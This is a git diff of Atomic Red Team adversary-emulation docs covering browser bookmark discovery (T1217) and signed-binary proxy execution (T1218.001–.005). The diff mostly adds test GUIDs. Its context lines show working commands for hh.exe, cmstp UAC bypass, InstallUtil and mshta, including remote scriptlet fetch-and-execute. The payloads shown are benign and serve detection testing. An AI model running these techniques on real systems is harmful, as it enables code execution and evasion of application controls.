## Atomic Test #2 - manage-bde.wsf Signed Script Command Execution -Executes the signed manage-bde.wsf script with options to execute an arbitrary command. +auto_generated_guid: 2a8f2d3c-3dec-4262-99dd-150cb2a4d63a + +Executes the signed manage-bde.wsf script with options to execute an arbitrary command. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | command_to_execute | A command to execute. | Path | %windir%\System32\calc.exe| diff --git a/atomics/T1217/T1217.md b/atomics/T1217/T1217.md index 0635173c..a7ef7b04 100644 --- a/atomics/T1217/T1217.md +++ b/atomics/T1217/T1217.md @@ -26,15 +26,17 @@ Specific storage locations vary based on platform and/or application, but browse
## Atomic Test #1 - List Mozilla Firefox Bookmark Database Files on Linux -Searches for Mozilla Firefox's places.sqlite file (on Linux distributions) that contains bookmarks and lists any found instances to a text file. +auto_generated_guid: 3a41f169-a5ab-407f-9269-abafdb5da6c2 + +Searches for Mozilla Firefox's places.sqlite file (on Linux distributions) that contains bookmarks and lists any found instances to a text file. **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Path where captured results will be placed. | Path | /tmp/T1217-Firefox.txt| @@ -60,15 +62,17 @@ rm -f #{output_file} 2>/dev/null
## Atomic Test #2 - List Mozilla Firefox Bookmark Database Files on macOS -Searches for Mozilla Firefox's places.sqlite file (on macOS) that contains bookmarks and lists any found instances to a text file. +auto_generated_guid: 1ca1f9c7-44bc-46bb-8c85-c50e2e94267b + +Searches for Mozilla Firefox's places.sqlite file (on macOS) that contains bookmarks and lists any found instances to a text file. **Supported Platforms:** macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Path where captured results will be placed. | Path | /tmp/T1217_Firefox.txt| @@ -94,15 +98,17 @@ rm -f #{output_file} 2>/dev/null
## Atomic Test #3 - List Google Chrome Bookmark JSON Files on macOS -Searches for Google Chrome's Bookmark file (on macOS) that contains bookmarks in JSON format and lists any found instances to a text file. +auto_generated_guid: b789d341-154b-4a42-a071-9111588be9bc + +Searches for Google Chrome's Bookmark file (on macOS) that contains bookmarks in JSON format and lists any found instances to a text file. **Supported Platforms:** macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Path where captured results will be placed. | Path | /tmp/T1217-Chrome.txt| @@ -128,9 +134,11 @@ rm -f #{output_file} 2>/dev/null
## Atomic Test #4 - List Google Chrome Bookmarks on Windows with powershell + +auto_generated_guid: faab755e-4299-48ec-8202-fc7885eb6545 + Searches for Google Chromes's Bookmarks file (on Windows distributions) that contains bookmarks. Upon execution, paths that contain bookmark files will be displayed. - **Supported Platforms:** Windows @@ -153,9 +161,11 @@ Get-ChildItem -Path C:\Users\ -Filter Bookmarks -Recurse -ErrorAction SilentlyCo
## Atomic Test #5 - List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt + +auto_generated_guid: 76f71e2f-480e-4bed-b61e-398fe17499d5 + Searches for Google Chromes's and Edge Chromium's Bookmarks file (on Windows distributions) that contains bookmarks. Upon execution, paths that contain bookmark files will be displayed. - **Supported Platforms:** Windows @@ -178,9 +188,11 @@ where /R C:\Users\ Bookmarks
## Atomic Test #6 - List Mozilla Firefox bookmarks on Windows with command prompt + +auto_generated_guid: 4312cdbc-79fc-4a9c-becc-53d49c734bc5 + Searches for Mozilla Firefox bookmarks file (on Windows distributions) that contains bookmarks in a SQLITE database. Upon execution, paths that contain bookmark files will be displayed. - **Supported Platforms:** Windows @@ -203,8 +215,10 @@ where /R C:\Users\ places.sqlite
## Atomic Test #7 - List Internet Explorer Bookmarks using the command prompt -This test will list the bookmarks for Internet Explorer that are found in the Favorites folder +auto_generated_guid: 727dbcdb-e495-4ab1-a6c4-80c7f77aef85 + +This test will list the bookmarks for Internet Explorer that are found in the Favorites folder **Supported Platforms:** Windows diff --git a/atomics/T1218.001/T1218.001.md b/atomics/T1218.001/T1218.001.md index ef702c12..a76fe782 100644 --- a/atomics/T1218.001/T1218.001.md +++ b/atomics/T1218.001/T1218.001.md @@ -24,16 +24,18 @@ A custom CHM file containing embedded payloads could be delivered to a victim th
## Atomic Test #1 - Compiled HTML Help Local Payload + +auto_generated_guid: 5cb87818-0d7c-4469-b7ef-9224107aebe8 + Uses hh.exe to execute a local compiled HTML Help payload. Upon execution calc.exe will open - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | local_chm_file | Local .chm payload | path | PathToAtomicsFolder\T1218.001\src\T1218.001.chm| @@ -52,7 +54,7 @@ hh.exe #{local_chm_file} ##### Description: The payload must exist on disk at specified location (#{local_chm_file}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{local_chm_file}) {exit 0} else {exit 1} +if (Test-Path #{local_chm_file}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -67,16 +69,18 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - Compiled HTML Help Remote Payload + +auto_generated_guid: 0f8af516-9818-4172-922b-42986ef1e81d + Uses hh.exe to execute a remote compiled HTML Help payload. Upon execution displays an error saying the file cannot be open - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_chm_file | Remote .chm payload | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.001/src/T1218.001.chm| @@ -97,15 +101,17 @@ hh.exe #{remote_chm_file}
## Atomic Test #3 - Invoke CHM with default Shortcut Command Execution -Executes a CHM file with the default Shortcut Command method. +auto_generated_guid: 29d6f0d7-be63-4482-8827-ea77126c1ef7 + +Executes a CHM file with the default Shortcut Command method. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | chm_file_path | Default path of CHM | string | Test.chm| | hh_file_path | path of modified HH.exe | path | $env:windir\hh.exe| @@ -127,7 +133,7 @@ Invoke-ATHCompiledHelp -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path} ```powershell $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable if (-not $RequiredModule) {exit 1} -if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0} +if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0} ``` ##### Get Prereq Commands: ```powershell @@ -141,15 +147,17 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #4 - Invoke CHM with InfoTech Storage Protocol Handler -Executes a CHM file with the ITS protocol handler. +auto_generated_guid: b4094750-5fc7-4e8e-af12-b4e36bf5e7f6 + +Executes a CHM file with the ITS protocol handler. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | hh_file_path | path of modified HH.exe | path | $env:windir\hh.exe| | infotech_storage_handler | Default InfoTech Storage Protocol Handler | string | its| @@ -172,7 +180,7 @@ Invoke-ATHCompiledHelp -InfoTechStorageHandler #{infotech_storage_handler} -HHFi ```powershell $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable if (-not $RequiredModule) {exit 1} -if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0} +if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0} ``` ##### Get Prereq Commands: ```powershell @@ -186,15 +194,17 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #5 - Invoke CHM Simulate Double click -Executes a CHM file simulating a user double click. +auto_generated_guid: 5decef42-92b8-4a93-9eb2-877ddcb9401a + +Executes a CHM file simulating a user double click. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | chm_file_path | Default path of CHM | string | Test.chm| @@ -215,7 +225,7 @@ Invoke-ATHCompiledHelp -SimulateUserDoubleClick -CHMFilePath #{chm_file_path} ```powershell $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable if (-not $RequiredModule) {exit 1} -if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0} +if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0} ``` ##### Get Prereq Commands: ```powershell @@ -229,15 +239,17 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #6 - Invoke CHM with Script Engine and Help Topic -Executes a CHM file with a defined script engine, ITS Protocol Handler, and help topic extension. +auto_generated_guid: 4f83adda-f5ec-406d-b318-9773c9ca92e5 + +Executes a CHM file with a defined script engine, ITS Protocol Handler, and help topic extension. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | topic_extension | Default Help Topic | string | html| | hh_file_path | path of modified HH.exe | path | $env:windir\hh.exe| @@ -262,7 +274,7 @@ Invoke-ATHCompiledHelp -ScriptEngine #{script_engine} -InfoTechStorageHandler #{ ```powershell $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable if (-not $RequiredModule) {exit 1} -if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0} +if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0} ``` ##### Get Prereq Commands: ```powershell @@ -276,15 +288,17 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #7 - Invoke CHM Shortcut Command with ITS and Help Topic -Executes a CHM file using the Shortcut Command method with a defined ITS Protocol Handler, and help topic extension. +auto_generated_guid: 15756147-7470-4a83-87fb-bb5662526247 + +Executes a CHM file using the Shortcut Command method with a defined ITS Protocol Handler, and help topic extension. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | topic_extension | Default Help Topic | string | html| | hh_file_path | path of modified HH.exe | path | $env:windir\hh.exe| @@ -308,7 +322,7 @@ Invoke-ATHCompiledHelp -ExecuteShortcutCommand -InfoTechStorageHandler #{infotec ```powershell $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable if (-not $RequiredModule) {exit 1} -if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0} +if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1218.002/T1218.002.md b/atomics/T1218.002/T1218.002.md index 8284a94a..831bf542 100644 --- a/atomics/T1218.002/T1218.002.md +++ b/atomics/T1218.002/T1218.002.md @@ -16,16 +16,18 @@ Adversaries may also rename malicious DLL files (.dll) with Control Panel file e
## Atomic Test #1 - Control Panel Items + +auto_generated_guid: 037e9d8a-9e46-4255-8b33-2ae3b545ca6f + This test simulates an adversary leveraging control.exe Upon execution calc.exe will be launched - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | cpl_file_path | path to cpl file | path | PathToAtomicsFolder\T1218.002\bin\calc.cpl| @@ -44,7 +46,7 @@ control.exe #{cpl_file_path} ##### Description: Cpl file must exist on disk at specified location (#{cpl_file_path}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{cpl_file_path}) {exit 0} else {exit 1} +if (Test-Path #{cpl_file_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1218.003/T1218.003.md b/atomics/T1218.003/T1218.003.md index 6fcb3da3..4cd4cfd9 100644 --- a/atomics/T1218.003/T1218.003.md +++ b/atomics/T1218.003/T1218.003.md @@ -16,15 +16,17 @@ CMSTP.exe can also be abused to [Bypass User Account Control](https://attack.mit
## Atomic Test #1 - CMSTP Executing Remote Scriptlet -Adversaries may supply CMSTP.exe with INF files infected with malicious commands +auto_generated_guid: 34e63321-9683-496b-bbc1-7566bc55e624 + +Adversaries may supply CMSTP.exe with INF files infected with malicious commands **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | inf_file_path | Path to the INF file | path | PathToAtomicsFolder\T1218.003\src\T1218.003.inf| @@ -43,7 +45,7 @@ cmstp.exe /s #{inf_file_path} ##### Description: INF file must exist on disk at specified location (#{inf_file_path}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{inf_file_path}) {exit 0} else {exit 1} +if (Test-Path #{inf_file_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -58,15 +60,17 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - CMSTP Executing UAC Bypass -Adversaries may invoke cmd.exe (or other malicious commands) by embedding them in the RunPreSetupCommandsSection of an INF file +auto_generated_guid: 748cb4f6-2fb3-4e97-b7ad-b22635a09ab0 + +Adversaries may invoke cmd.exe (or other malicious commands) by embedding them in the RunPreSetupCommandsSection of an INF file **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | inf_file_uac | Path to the INF file | path | PathToAtomicsFolder\T1218.003\src\T1218.003_uacbypass.inf| @@ -85,7 +89,7 @@ cmstp.exe /s #{inf_file_uac} /au ##### Description: INF file must exist on disk at specified location (#{inf_file_uac}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{inf_file_uac}) {exit 0} else {exit 1} +if (Test-Path #{inf_file_uac}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1218.004/T1218.004.md b/atomics/T1218.004/T1218.004.md index c7a174a8..d30c0256 100644 --- a/atomics/T1218.004/T1218.004.md +++ b/atomics/T1218.004/T1218.004.md @@ -26,16 +26,18 @@ InstallUtil may also be used to bypass application control through use of attrib
## Atomic Test #1 - CheckIfInstallable method call + +auto_generated_guid: ffd9c807-d402-47d2-879d-f915cf2a3a94 + Executes the CheckIfInstallable class constructor runner instead of executing InstallUtil. Upon execution, the InstallUtil test harness will be executed. If no output is displayed the test executed successfuly. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | test_harness | location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly | Path | PathToAtomicsFolder\T1218.004\src\InstallUtilTestHarness.ps1| | assembly_dir | directory to drop the compiled installer assembly | Path | $Env:TEMP\| @@ -87,7 +89,7 @@ Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore ##### Description: InstallUtil test harness script must be installed at specified location (#{test_harness}) ##### Check Prereq Commands: ```powershell -if (Test-Path "#{test_harness}") {exit 0} else {exit 1} +if (Test-Path "#{test_harness}") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -102,16 +104,18 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - InstallHelper method call + +auto_generated_guid: d43a5bde-ae28-4c55-a850-3f4c80573503 + Executes the InstallHelper class constructor runner instead of executing InstallUtil. Upon execution, no output will be displayed if the test executed successfuly. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | test_harness | location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly | Path | PathToAtomicsFolder\T1218.004\src\InstallUtilTestHarness.ps1| | assembly_dir | directory to drop the compiled installer assembly | Path | $Env:TEMP\| @@ -165,7 +169,7 @@ Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore ##### Description: InstallUtil test harness script must be installed at specified location (#{test_harness}) ##### Check Prereq Commands: ```powershell -if (Test-Path "#{test_harness}") {exit 0} else {exit 1} +if (Test-Path "#{test_harness}") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -180,15 +184,17 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #3 - InstallUtil class constructor method call -Executes the installer assembly class constructor. Upon execution, version information will be displayed the .NET framework install utility. +auto_generated_guid: 9b7a7cfc-dd2e-43f5-a885-c0a3c270dd93 + +Executes the installer assembly class constructor. Upon execution, version information will be displayed the .NET framework install utility. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | test_harness | location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly | Path | PathToAtomicsFolder\T1218.004\src\InstallUtilTestHarness.ps1| | assembly_dir | directory to drop the compiled installer assembly | Path | $Env:TEMP\| @@ -242,7 +248,7 @@ Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore ##### Description: InstallUtil test harness script must be installed at specified location (#{test_harness}) ##### Check Prereq Commands: ```powershell -if (Test-Path "#{test_harness}") {exit 0} else {exit 1} +if (Test-Path "#{test_harness}") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -257,15 +263,17 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #4 - InstallUtil Install method call -Executes the Install Method. Upon execution, version information will be displayed the .NET framework install utility. +auto_generated_guid: 9f9968a6-601a-46ca-b7b7-6d4fe0f98f0b + +Executes the Install Method. Upon execution, version information will be displayed the .NET framework install utility. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | test_harness | location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly | Path | PathToAtomicsFolder\T1218.004\src\InstallUtilTestHarness.ps1| | assembly_dir | directory to drop the compiled installer assembly | Path | $Env:TEMP\| @@ -319,7 +327,7 @@ Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore ##### Description: InstallUtil test harness script must be installed at specified location (#{test_harness}) ##### Check Prereq Commands: ```powershell -if (Test-Path "#{test_harness}") {exit 0} else {exit 1} +if (Test-Path "#{test_harness}") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -334,15 +342,17 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #5 - InstallUtil Uninstall method call - /U variant -Executes the Uninstall Method. Upon execution, version information will be displayed the .NET framework install utility. +auto_generated_guid: 34428cfa-8e38-41e5-aff4-9e1f8f3a7b4b + +Executes the Uninstall Method. Upon execution, version information will be displayed the .NET framework install utility. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | test_harness | location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly | Path | PathToAtomicsFolder\T1218.004\src\InstallUtilTestHarness.ps1| | assembly_dir | directory to drop the compiled installer assembly | Path | $Env:TEMP\| @@ -396,7 +406,7 @@ Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore ##### Description: InstallUtil test harness script must be installed at specified location (#{test_harness}) ##### Check Prereq Commands: ```powershell -if (Test-Path "#{test_harness}") {exit 0} else {exit 1} +if (Test-Path "#{test_harness}") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -411,15 +421,17 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #6 - InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant -Executes the Uninstall Method. Upon execution, version information will be displayed the .NET framework install utility. +auto_generated_guid: 06d9deba-f732-48a8-af8e-bdd6e4d98c1d + +Executes the Uninstall Method. Upon execution, version information will be displayed the .NET framework install utility. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | test_harness | location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly | Path | PathToAtomicsFolder\T1218.004\src\InstallUtilTestHarness.ps1| | assembly_dir | directory to drop the compiled installer assembly | Path | $Env:TEMP\| @@ -473,7 +485,7 @@ Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore ##### Description: InstallUtil test harness script must be installed at specified location (#{test_harness}) ##### Check Prereq Commands: ```powershell -if (Test-Path "#{test_harness}") {exit 0} else {exit 1} +if (Test-Path "#{test_harness}") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -488,15 +500,17 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #7 - InstallUtil HelpText method call -Executes the Uninstall Method. Upon execution, help information will be displayed for InstallUtil. +auto_generated_guid: 5a683850-1145-4326-a0e5-e91ced3c6022 + +Executes the Uninstall Method. Upon execution, help information will be displayed for InstallUtil. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | test_harness | location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly | Path | PathToAtomicsFolder\T1218.004\src\InstallUtilTestHarness.ps1| | assembly_dir | directory to drop the compiled installer assembly | Path | $Env:TEMP\| @@ -550,7 +564,7 @@ Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore ##### Description: InstallUtil test harness script must be installed at specified location (#{test_harness}) ##### Check Prereq Commands: ```powershell -if (Test-Path "#{test_harness}") {exit 0} else {exit 1} +if (Test-Path "#{test_harness}") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -565,16 +579,18 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #8 - InstallUtil evasive invocation + +auto_generated_guid: 559e6d06-bb42-4307-bff7-3b95a8254bad + Executes an InstallUtil assembly by renaming InstallUtil.exe and using a nonstandard extension for the assembly. Upon execution, "Running a transacted installation." will be displayed, along with other information about the opperation. "The transacted install has completed." will be displayed upon completion. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | test_harness | location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly | Path | PathToAtomicsFolder\T1218.004\src\InstallUtilTestHarness.ps1| @@ -631,7 +647,7 @@ Remove-Item -Path "$Env:windir\System32\Tasks\notepad.exe" -ErrorAction Ignore ##### Description: InstallUtil test harness script must be installed at specified location (#{test_harness}) ##### Check Prereq Commands: ```powershell -if (Test-Path "#{test_harness}") {exit 0} else {exit 1} +if (Test-Path "#{test_harness}") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1218.005/T1218.005.md b/atomics/T1218.005/T1218.005.md index 077398a1..420c1301 100644 --- a/atomics/T1218.005/T1218.005.md +++ b/atomics/T1218.005/T1218.005.md @@ -34,15 +34,17 @@ Mshta.exe can be used to bypass application control solutions that do not accoun
## Atomic Test #1 - Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject -Test execution of a remote script using mshta.exe. Upon execution calc.exe will be launched. +auto_generated_guid: 1483fab9-4f52-4217-a9ce-daa9d7747cae + +Test execution of a remote script using mshta.exe. Upon execution calc.exe will be launched. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_url | location of the payload | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct| @@ -63,10 +65,12 @@ mshta.exe javascript:a=(GetObject('script:#{file_url}')).Exec();close();
## Atomic Test #2 - Mshta executes VBScript to execute malicious command + +auto_generated_guid: 906865c3-e05f-4acc-85c4-fbc185455095 + Run a local VB script to run local user enumeration powershell command. This attempts to emulate what FIN7 does with this technique which is using mshta.exe to execute VBScript to execute malicious code on victim systems. Upon execution, a new PowerShell windows will be opened that displays user information. - **Supported Platforms:** Windows @@ -89,15 +93,17 @@ mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -noexit
## Atomic Test #3 - Mshta Executes Remote HTML Application (HTA) -Execute an arbitrary remote HTA. Upon execution calc.exe will be launched. +auto_generated_guid: c4b97eeb-5249-4455-a607-59f95485cb45 + +Execute an arbitrary remote HTA. Upon execution calc.exe will be launched. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | temp_file | temp_file location for hta | string | $env:appdata\Microsoft\Windows\Start Menu\Programs\Startup\T1218.005.hta| | hta_url | URL to HTA file for execution | string | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/T1218.005.hta| @@ -125,15 +131,17 @@ remove-item "#{temp_file}" -ErrorAction Ignore
## Atomic Test #4 - Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement -Executes an HTA Application using JScript script engine using local UNC path simulating lateral movement. +auto_generated_guid: 007e5672-2088-4853-a562-7490ddc19447 + +Executes an HTA Application using JScript script engine using local UNC path simulating lateral movement. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | script_engine | Script Engine to use | string | JScript| | hta_file_path | HTA file name and or path to be used | string | Test.hta| @@ -156,7 +164,7 @@ Invoke-ATHHTMLApplication -HTAFilePath #{hta_file_path} -ScriptEngine #{script_e ```powershell $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable if (-not $RequiredModule) {exit 1} -if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0} +if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0} ``` ##### Get Prereq Commands: ```powershell @@ -170,15 +178,17 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #5 - Invoke HTML Application - Jscript Engine Simulating Double Click -Executes an HTA Application using JScript script engine simulating double click. +auto_generated_guid: 58a193ec-131b-404e-b1ca-b35cf0b18c33 + +Executes an HTA Application using JScript script engine simulating double click. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | script_engine | Script Engine to use | string | JScript| | hta_file_path | HTA file name and or path to be used | string | Test.hta| @@ -200,7 +210,7 @@ Invoke-ATHHTMLApplication -HTAFilePath #{hta_file_path} -ScriptEngine #{script_e ```powershell $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable if (-not $RequiredModule) {exit 1} -if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0} +if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0} ``` ##### Get Prereq Commands: ```powershell @@ -214,15 +224,17 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #6 - Invoke HTML Application - Direct download from URI -Executes an HTA Application by directly downloading from remote URI. +auto_generated_guid: 39ceed55-f653-48ac-bd19-aceceaf525db + +Executes an HTA Application by directly downloading from remote URI. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | mshta_file_path | Location of mshta.exe | string | $env:windir\system32\mshta.exe| | hta_uri | URI to HTA | string | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/24549e3866407c3080b95b6afebf78e8acd23352/atomics/T1218.005/src/T1218.005.hta| @@ -244,7 +256,7 @@ Invoke-ATHHTMLApplication -HTAUri #{hta_uri} -MSHTAFilePath #{mshta_file_path} ```powershell $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable if (-not $RequiredModule) {exit 1} -if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0} +if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0} ``` ##### Get Prereq Commands: ```powershell @@ -258,15 +270,17 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #7 - Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler -Executes an HTA Application with JScript Engine, Rundll32 and Inline Protocol Handler. +auto_generated_guid: e7e3a525-7612-4d68-a5d3-c4649181b8af + +Executes an HTA Application with JScript Engine, Rundll32 and Inline Protocol Handler. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | rundll32_file_path | Location of rundll32.exe | string | $env:windir\system32\rundll32.exe| | script_engine | Script Engine to use | string | JScript| @@ -289,7 +303,7 @@ Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler ```powershell $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable if (-not $RequiredModule) {exit 1} -if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0} +if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0} ``` ##### Get Prereq Commands: ```powershell @@ -303,15 +317,17 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
